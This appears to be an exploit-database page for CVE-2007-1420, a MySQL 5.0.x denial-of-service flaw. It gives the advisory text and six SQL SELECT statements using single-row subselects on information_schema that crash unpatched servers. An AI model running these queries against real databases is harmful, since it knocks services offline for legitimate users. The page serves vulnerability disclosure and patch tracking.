Lucene search
+L

MySQL 5.0.x - Single Row SubSelect Remote Denial of Service

🗓️ 09 Mar 2007 00:00:00Reported by S.StreichsbierType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

MySQL 5.0.x - Remote DoS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-1420
12 Mar 200723:00
cve
Cvelist
CVE-2007-1420
12 Mar 200723:00
cvelist
Oracle linux
mysql security and bug fix update
30 May 200800:00
oraclelinux
EUVD
EUVD-2007-1414
7 Oct 202500:30
euvd
Tenable Nessus
GLSA-200705-11 : MySQL: Two Denial of Service vulnerabilities
10 May 200700:00
nessus
Tenable Nessus
Mandrake Linux Security Advisory : MySQL (MDKSA-2007:139)
5 Jul 200700:00
nessus
Tenable Nessus
MySQL < 5.0.36 Denial of Service
16 Jan 201200:00
nessus
Tenable Nessus
MySQL Single Row Subselect Remote DoS
30 Mar 200700:00
nessus
Tenable Nessus
Oracle Linux 5 : mysql (ELSA-2008-0364)
7 Sep 202300:00
nessus
Tenable Nessus
RHEL 5 : mysql (RHSA-2008:0364)
22 May 200800:00
nessus
Rows per page
source: https://www.securityfocus.com/bid/22900/info

MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata.

An attacker can exploit this issue to crash the application, denying access to legitimate users. The attacker may also be able to execute arbitrary code, but this has not yet been confirmed.

NOTE: An attacker must be able to execute arbitrary SELECT statements on the vulnerable computer to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.

Versions prior to 5.0.36 are vulnerable.

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Nov 2013 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 22.1
EPSS0.00985
33